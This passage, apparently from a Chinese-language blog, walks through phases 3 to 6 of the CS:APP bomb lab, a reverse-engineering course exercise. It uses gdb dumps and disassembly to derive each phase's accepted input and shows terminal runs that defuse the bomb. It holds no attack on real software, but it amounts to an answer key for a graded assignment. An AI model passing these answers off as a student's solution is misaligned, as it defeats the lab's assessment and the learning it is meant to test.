0x4024e0: 0x7720626d 0x20687469 0x6c727463 0x202c632d
0x4024f0: 0x79206f64 0x003f756f 0x73727543 0x202c7365
0x402500: 0x27756f79 0x66206576 0x646e756f 0x65687420
0x402510: 0x63657320 0x20746572 0x73616870 0x00002165
0x402520: 0x20747542 0x646e6966 0x20676e69 0x61207469
0x402530: 0x7320646e 0x69766c6f 0x6920676e 0x72612074
0x402540: 0x75712065 0x20657469 0x66666964 0x6e657265
0x402550: 0x2e2e2e74 0x00000000 0x676e6f43 0x75746172
0x402560: 0x6974616c 0x21736e6f 0x756f5920 0x20657627
0x402570: 0x75666564 0x20646573 0x20656874 0x626d6f62
0x402580: 0x65570021 0x2e2e6c6c 0x4b4f002e 0x2d3a202e
0x402590: 0x6e490029 0x696c6176 0x68702064 0x25657361
0x4025a0: 0x0a000a73 0x4d4f4f42 0x00212121 0x20656854
0x4025b0: 0x626d6f62 0x73616820 0x6f6c6220 0x75206e77
0x4025c0: 0x25002e70 0x64252064 0x20642520 0x25206425
0x4025d0: 0x64252064 0x72724500 0x203a726f 0x6d657250
0x4025e0: 0x72757461 0x4f452065 0x6e6f2046 0x64747320
0x4025f0: 0x47006e69 0x45444152 0x4d4f425f 0x72450042
(gdb)

可以得到两个数字的 8 个组合。
(0, 207) (1, 311) (2, 707) (3, 256) (4, 389) (5, 206) (6, 682) (7, 327)

输入这八个数字,都正确:

1
2
3
4
5
6
7
8
9
10
➜  bomb git:(master) ./bomb 
Welcome to my fiendish little bomb. You have 6 phases with
which to blow yourself up. Have a nice day!
Border relations with Canada have never been better.
Phase 1 defused. How about the next one?
1 2 4 8 16 32
That's number 2. Keep going!
0 207
Halfway there!

1
2
3
4
5
6
7
8
9
10
➜  bomb git:(master) ./bomb
Welcome to my fiendish little bomb. You have 6 phases with
which to blow yourself up. Have a nice day!
Border relations with Canada have never been better.
Phase 1 defused. How about the next one?
1 2 4 8 16 32
That's number 2. Keep going!
1 311
Halfway there!

1
2
3
4
5
6
7
8
9
10
➜  bomb git:(master) ./bomb
Welcome to my fiendish little bomb. You have 6 phases with
which to blow yourself up. Have a nice day!
Border relations with Canada have never been better.
Phase 1 defused. How about the next one?
1 2 4 8 16 32
That's number 2. Keep going!
2 707
Halfway there!

1
2
3
4
5
6
7
8
9
10
➜  bomb git:(master) ./bomb         
Welcome to my fiendish little bomb. You have 6 phases with
which to blow yourself up. Have a nice day!
Border relations with Canada have never been better.
Phase 1 defused. How about the next one?
1 2 4 8 16 32
That's number 2. Keep going!
3 256
Halfway there!

1
2
3
4
5
6
7
8
9
10
➜  bomb git:(master) ./bomb
Welcome to my fiendish little bomb. You have 6 phases with
which to blow yourself up. Have a nice day!
Border relations with Canada have never been better.
Phase 1 defused. How about the next one?
1 2 4 8 16 32
That's number 2. Keep going!
4 389
Halfway there!

1
2
3
4
5
6
7
8
9
10
➜  bomb git:(master) ./bomb
Welcome to my fiendish little bomb. You have 6 phases with
which to blow yourself up. Have a nice day!
Border relations with Canada have never been better.
Phase 1 defused. How about the next one?
1 2 4 8 16 32
That's number 2. Keep going!
5 206
Halfway there!

1
2
3
4
5
6
7
8
9
10
➜  bomb git:(master) ./bomb
Welcome to my fiendish little bomb. You have 6 phases with
which to blow yourself up. Have a nice day!
Border relations with Canada have never been better.
Phase 1 defused. How about the next one?
1 2 4 8 16 32
That's number 2. Keep going!
6 682
Halfway there!

1
2
3
4
5
6
7
8
9
10
➜  bomb git:(master) ./bomb
Welcome to my fiendish little bomb. You have 6 phases with
which to blow yourself up. Have a nice day!
Border relations with Canada have never been better.
Phase 1 defused. How about the next one?
1 2 4 8 16 32
That's number 2. Keep going!
7 327
Halfway there!

正如之前所分析的,在这两个数字之后加入任意内容都不影响我们第三个短语的成功

1
2
3
4
5
6
7
8
9
10
➜  bomb git:(master) ./bomb
Welcome to my fiendish little bomb. You have 6 phases with
which to blow yourself up. Have a nice day!
Border relations with Canada have never been better.
Phase 1 defused. How about the next one?
1 2 4 8 16 32
That's number 2. Keep going!
7 327 ardxwe 158
Halfway there!

一切都是那么的自然

第四个短语

查看 main 函数 54-56 行:

1
2
3
400e86:    e8 13 06 00 00           callq  40149e <read_line>
400e8b: 48 89 c7 mov %rax,%rdi
400e8e: e8 79 01 00 00 callq 40100c <phase_4>

输入字符的指针传递给 phase_4 作为第一个参数,查看 phase_4 对应位置汇编代码。由于这里 phase_4 调用了 func4 函数,因此将 func4 一并贴出。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
0000000000400fce <func4>:
400fce: 48 83 ec 08 sub $0x8,%rsp
400fd2: 89 d0 mov %edx,%eax
400fd4: 29 f0 sub %esi,%eax
400fd6: 89 c1 mov %eax,%ecx
400fd8: c1 e9 1f shr $0x1f,%ecx
400fdb: 01 c8 add %ecx,%eax
400fdd: d1 f8 sar %eax
400fdf: 8d 0c 30 lea (%rax,%rsi,1),%ecx
400fe2: 39 f9 cmp %edi,%ecx
400fe4: 7e 0c jle 400ff2 <func4+0x24>
400fe6: 8d 51 ff lea -0x1(%rcx),%edx
400fe9: e8 e0 ff ff ff callq 400fce <func4>
400fee: 01 c0 add %eax,%eax
400ff0: eb 15 jmp 401007 <func4+0x39>
400ff2: b8 00 00 00 00 mov $0x0,%eax
400ff7: 39 f9 cmp %edi,%ecx
400ff9: 7d 0c jge 401007 <func4+0x39>
400ffb: 8d 71 01 lea 0x1(%rcx),%esi
400ffe: e8 cb ff ff ff callq 400fce <func4>
401003: 8d 44 00 01 lea 0x1(%rax,%rax,1),%eax
401007: 48 83 c4 08 add $0x8,%rsp
40100b: c3 retq

000000000040100c <phase_4>:
40100c: 48 83 ec 18 sub $0x18,%rsp
401010: 48 8d 4c 24 0c lea 0xc(%rsp),%rcx
401015: 48 8d 54 24 08 lea 0x8(%rsp),%rdx
40101a: be cf 25 40 00 mov $0x4025cf,%esi
40101f: b8 00 00 00 00 mov $0x0,%eax
401024: e8 c7 fb ff ff callq 400bf0 <__isoc99_sscanf@plt>
401029: 83 f8 02 cmp $0x2,%eax
40102c: 75 07 jne 401035 <phase_4+0x29>
40102e: 83 7c 24 08 0e cmpl $0xe,0x8(%rsp)
401033: 76 05 jbe 40103a <phase_4+0x2e>
401035: e8 00 04 00 00 callq 40143a <explode_bomb>
40103a: ba 0e 00 00 00 mov $0xe,%edx
40103f: be 00 00 00 00 mov $0x0,%esi
401044: 8b 7c 24 08 mov 0x8(%rsp),%edi
401048: e8 81 ff ff ff callq 400fce <func4>
40104d: 85 c0 test %eax,%eax
40104f: 75 07 jne 401058 <phase_4+0x4c>
401051: 83 7c 24 0c 00 cmpl $0x0,0xc(%rsp)
401056: 74 05 je 40105d <phase_4+0x51>
401058: e8 dd 03 00 00 callq 40143a <explode_bomb>
40105d: 48 83 c4 18 add $0x18,%rsp
401061: c3 retq
  • 29-33: 需要两个参数, 至于参数具体格式, 可以通过查看 esi 寄存器存储的内存地址内容
1
2
(gdb) p (char*)0x4025cf
$2 = 0x4025cf "%d %d"

显然,刚好需要两个整数。

  • 34-47:第一个参数 <= 15,调用 func4的返回值应该是0,第二个数字是0

仔细分析 func4, 15 >> 1 == 7,如果输入是7,刚好满足 jle 和 jge 的条件, 而且 rax = 0, 满足题意,故答案为(7, 0)

1
2
3
4
5
6
7
8
9
10
11
12
➜  bomb git:(master) ./bomb
Welcome to my fiendish little bomb. You have 6 phases with
which to blow yourself up. Have a nice day!
Border relations with Canada have never been better.
Phase 1 defused. How about the next one?
1 2 4 8 16 32
That's number 2. Keep going!
0 207
Halfway there!
7 0
So you got that one. Try this one.

第五个短语

查看 main 函数第 60-62 行:

1
2
3
400ea2:    e8 f7 05 00 00           callq  40149e <read_line>
400ea7: 48 89 c7 mov %rax,%rdi
400eaa: e8 b3 01 00 00 callq 401062 <phase_5>

查看 phase_5 对应汇编代码:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
0000000000401062 <phase_5>:
401062: 53 push %rbx
401063: 48 83 ec 20 sub $0x20,%rsp
401067: 48 89 fb mov %rdi,%rbx
40106a: 64 48 8b 04 25 28 00 mov %fs:0x28,%rax
401071: 00 00
401073: 48 89 44 24 18 mov %rax,0x18(%rsp)
401078: 31 c0 xor %eax,%eax
40107a: e8 9c 02 00 00 callq 40131b <string_length>
40107f: 83 f8 06 cmp $0x6,%eax
401082: 74 4e je 4010d2 <phase_5+0x70>
401084: e8 b1 03 00 00 callq 40143a <explode_bomb>
401089: eb 47 jmp 4010d2 <phase_5+0x70>
40108b: 0f b6 0c 03 movzbl (%rbx,%rax,1),%ecx
40108f: 88 0c 24 mov %cl,(%rsp)
401092: 48 8b 14 24 mov (%rsp),%rdx
401096: 83 e2 0f and $0xf,%edx
401099: 0f b6 92 b0 24 40 00 movzbl 0x4024b0(%rdx),%edx
4010a0: 88 54 04 10 mov %dl,0x10(%rsp,%rax,1)
4010a4: 48 83 c0 01 add $0x1,%rax
4010a8: 48 83 f8 06 cmp $0x6,%rax
4010ac: 75 dd jne 40108b <phase_5+0x29>
4010ae: c6 44 24 16 00 movb $0x0,0x16(%rsp)
4010b3: be 5e 24 40 00 mov $0x40245e,%esi
4010b8: 48 8d 7c 24 10 lea 0x10(%rsp),%rdi
4010bd: e8 76 02 00 00 callq 401338 <strings_not_equal>
4010c2: 85 c0 test %eax,%eax
4010c4: 74 13 je 4010d9 <phase_5+0x77>
4010c6: e8 6f 03 00 00 callq 40143a <explode_bomb>
4010cb: 0f 1f 44 00 00 nopl 0x0(%rax,%rax,1)
4010d0: eb 07 jmp 4010d9 <phase_5+0x77>
4010d2: b8 00 00 00 00 mov $0x0,%eax
4010d7: eb b2 jmp 40108b <phase_5+0x29>
4010d9: 48 8b 44 24 18 mov 0x18(%rsp),%rax
4010de: 64 48 33 04 25 28 00 xor %fs:0x28,%rax
4010e5: 00 00
4010e7: 74 05 je 4010ee <phase_5+0x8c>
4010e9: e8 42 fa ff ff callq 400b30 <__stack_chk_fail@plt>
4010ee: 48 83 c4 20 add $0x20,%rsp
4010f2: 5b pop %rbx
4010f3: c3 retq
  • 9-10: 字符串长度为6
  • 13-41: 每个字符对应字节后四位作为偏移,以 0x4024b0 作为基地址,最终和 0x40245e 内存地址做比较。
    使用 gdb 查看相应内存地址内容:
1
2
(gdb) p (char*)0x40245e
$1 = 0x40245e "flyers"
1
2
(gdb) p (char*)0x4024b0
$2 = 0x4024b0 <array> "maduiersnfotvbylSo you think you can stop the bomb with ctrl-c, do you?"

为了得到 flyers, 需要的偏移地址为 9fe567,理论上 ASCII 码可打印字符均可。

故答案为 9?>567 或者 y_^UVW 等等 只要满足最后四位要求即可。

1
2
3
4
5
6
7
8
9
10
11
12
13
➜  bomb git:(master) ./bomb
Welcome to my fiendish little bomb. You have 6 phases with
which to blow yourself up. Have a nice day!
Border relations with Canada have never been better.
Phase 1 defused. How about the next one?
1 2 4 8 16 32
That's number 2. Keep going!
7 327
Halfway there!
7 0
So you got that one. Try this one.
9?>567
Good work! On to the next...
1
2
3
4
5
6
7
8
9
10
11
12
13
➜  bomb git:(master) ./bomb         
Welcome to my fiendish little bomb. You have 6 phases with
which to blow yourself up. Have a nice day!
Border relations with Canada have never been better.
Phase 1 defused. How about the next one?
1 2 4 8 16 32
That's number 2. Keep going!
7 327
Halfway there!
7 0
So you got that one. Try this one.
y_^UVW
Good work! On to the next...

我们成功了!

第六个短语

查看 main 函数第 66-68 行

1
2
3
400ebe:    e8 db 05 00 00           callq  40149e <read_line>
400ec3: 48 89 c7 mov %rax,%rdi
400ec6: e8 29 02 00 00 callq 4010f4 <phase_6>

查看内存地址 0x4010f4

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
00000000004010f4 <phase_6>:
4010f4: 41 56 push %r14
4010f6: 41 55 push %r13
4010f8: 41 54 push %r12
4010fa: 55 push %rbp
4010fb: 53 push %rbx
4010fc: 48 83 ec 50 sub $0x50,%rsp
401100: 49 89 e5 mov %rsp,%r13
401103: 48 89 e6 mov %rsp,%rsi
401106: e8 51 03 00 00 callq 40145c <read_six_numbers>
40110b: 49 89 e6 mov %rsp,%r14
40110e: 41 bc 00 00 00 00 mov $0x0,%r12d
401114: 4c 89 ed mov %r13,%rbp
401117: 41 8b 45 00 mov 0x0(%r13),%eax
40111b: 83 e8 01 sub $0x1,%eax
40111e: 83 f8 05 cmp $0x5,%eax
401121: 76 05 jbe 401128 <phase_6+0x34>
401123: e8 12 03 00 00 callq 40143a <explode_bomb>
401128: 41 83 c4 01 add $0x1,%r12d
40112c: 41 83 fc 06 cmp $0x6,%r12d
401130: 74 21 je 401153 <phase_6+0x5f>
401132: 44 89 e3 mov %r12d,%ebx
401135: 48 63 c3 movslq %ebx,%rax
401138: 8b 04 84 mov (%rsp,%rax,4),%eax
40113b: 39 45 00 cmp %eax,0x0(%rbp)
40113e: 75 05 jne 401145 <phase_6+0x51>
401140: e8 f5 02 00 00 callq 40143a <explode_bomb>
401145: 83 c3 01 add $0x1,%ebx
401148: 83 fb 05 cmp $0x5,%ebx
40114b: 7e e8 jle 401135 <phase_6+0x41>
40114d: 49 83 c5 04 add $0x4,%r13
401151: eb c1 jmp 401114 <phase_6+0x20>
401153: 48 8d 74 24 18 lea 0x18(%rsp),%rsi
401158: 4c 89 f0 mov %r14,%rax
40115b: b9 07 00 00 00 mov $0x7,%ecx
401160: 89 ca mov %ecx,%edx
401162: 2b 10 sub (%rax),%edx
401164: 89 10 mov %edx,(%rax)
401166: 48 83 c0 04 add $0x4,%rax
40116a: 48 39 f0 cmp %rsi,%rax
40116d: 75 f1 jne 401160 <phase_6+0x6c>
40116f: be 00 00 00 00 mov $0x0,%esi
401174: eb 21 jmp 401197 <phase_6+0xa3>
401176: 48 8b 52 08 mov 0x8(%rdx),%rdx
40117a: 83 c0 01 add $0x1,%eax
40117d: 39 c8 cmp %ecx,%eax
40117f: 75 f5 jne 401176 <phase_6+0x82>
401181: eb 05 jmp 401188 <phase_6+0x94>
401183: ba d0 32 60 00 mov $0x6032d0,%edx
401188: 48 89 54 74 20 mov %rdx,0x20(%rsp,%rsi,2)
40118d: 48 83 c6 04 add $0x4,%rsi
401191: 48 83 fe 18 cmp $0x18,%rsi
401195: 74 14 je 4011ab <phase_6+0xb7>
401197: 8b 0c 34 mov (%rsp,%rsi,1),%ecx
40119a: 83 f9 01 cmp $0x1,%ecx
40119d: 7e e4 jle 401183 <phase_6+0x8f>
40119f: b8 01 00 00 00 mov $0x1,%eax
4011a4: ba d0 32 60 00 mov $0x6032d0,%edx
4011a9: eb cb jmp 401176 <phase_6+0x82>
4011ab: 48 8b 5c 24 20 mov 0x20(%rsp),%rbx
4011b0: 48 8d 44 24 28 lea 0x28(%rsp),%rax
4011b5: 48 8d 74 24 50 lea 0x50(%rsp),%rsi
4011ba: 48 89 d9 mov %rbx,%rcx
4011bd: 48 8b 10 mov (%rax),%rdx
4011c0: 48 89 51 08 mov %rdx,0x8(%rcx)
4011c4: 48 83 c0 08 add $0x8,%rax
4011c8: 48 39 f0 cmp %rsi,%rax
4011cb: 74 05 je 4011d2 <phase_6+0xde>
4011cd: 48 89 d1 mov %rdx,%rcx
4011d0: eb eb jmp 4011bd <phase_6+0xc9>
4011d2: 48 c7 42 08 00 00 00 movq $0x0,0x8(%rdx)
4011d9: 00
4011da: bd 05 00 00 00 mov $0x5,%ebp
4011df: 48 8b 43 08 mov 0x8(%rbx),%rax
4011e3: 8b 00 mov (%rax),%eax
4011e5: 39 03 cmp %eax,(%rbx)
4011e7: 7d 05 jge 4011ee <phase_6+0xfa>
4011e9: e8 4c 02 00 00 callq 40143a <explode_bomb>
4011ee: 48 8b 5b 08 mov 0x8(%rbx),%rbx
4011f2: 83 ed 01 sub $0x1,%ebp
4011f5: 75 e8 jne 4011df <phase_6+0xeb>
4011f7: 48 83 c4 50 add $0x50,%rsp
4011fb: 5b pop %rbx
4011fc: 5d pop %rbp
4011fd: 41 5c pop %r12
4011ff: 41 5d pop %r13
401201: 41 5e pop %r14
401203: c3 retq

或许看到如此冗长的汇编代码你会感到茫然,其实没有什么难度,多点耐心就好。

主要表达的是:

  • 共有六个数字,每个数字 <= 6
  • 每个数字执行固定操作 取反 + 7
  • 用操作后的数字作为取址次数,0x6032d0作为基地址,按顺序将对应内存位置 + 8 的内容存储到堆栈。
  • 按顺序,堆栈处所存储地址对应的数字应该是递减的

查看 0x6032d0 内存内容:

1
2
3
4
5
6
7
(gdb) x/100x 0x6032d0
0x6032d0 <node1>: 0x0000014c 0x00000001 0x006032e0 0x00000000
0x6032e0 <node2>: 0x000000a8 0x00000002 0x006032f0 0x00000000
0x6032f0 <node3>: 0x0000039c 0x00000003 0x00603300 0x00000000
0x603300 <node4>: 0x000002b3 0x00000004 0x00603310 0x00000000
0x603310 <node5>: 0x000001dd 0x00000005 0x00603320 0x00000000
0x603320 <node6>: 0x000001bb 0x00000006 0x00000000 0x00000000

对应内存地址内容从小到大排列应该是 0x6032f0 0x603300 0x603310 0x603320 0x6032d0 0x6032e0
循环次数应该是 2 3 4 5 0 1,注意到 main 函数第57行:

1
40119f:    b8 01 00 00 00           mov    $0x1,%eax

比较时 eax 初始值为1,每操作一次,然后比较。所以,实际的值应该为 3 4 5 6 1 2,又因为一开始对数字进行取反加7的操作,所以本来的6个数字应该是 4 3 2 1 6 5

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
➜  bomb git:(master) ./bomb
Welcome to my fiendish little bomb. You have 6 phases with
which to blow yourself up. Have a nice day!
Border relations with Canada have never been better.
Phase 1 defused. How about the next one?
1 2 4 8 16 32
That's number 2. Keep going!
7 327
Halfway there!
7 0
So you got that one. Try this one.
9?>567
Good work! On to the next...
4 3 2 1 6 5
Congratulations! You've defused the bomb!

全文完

任何建议或者疑问你可以发我邮件: ardxwe@gmail.com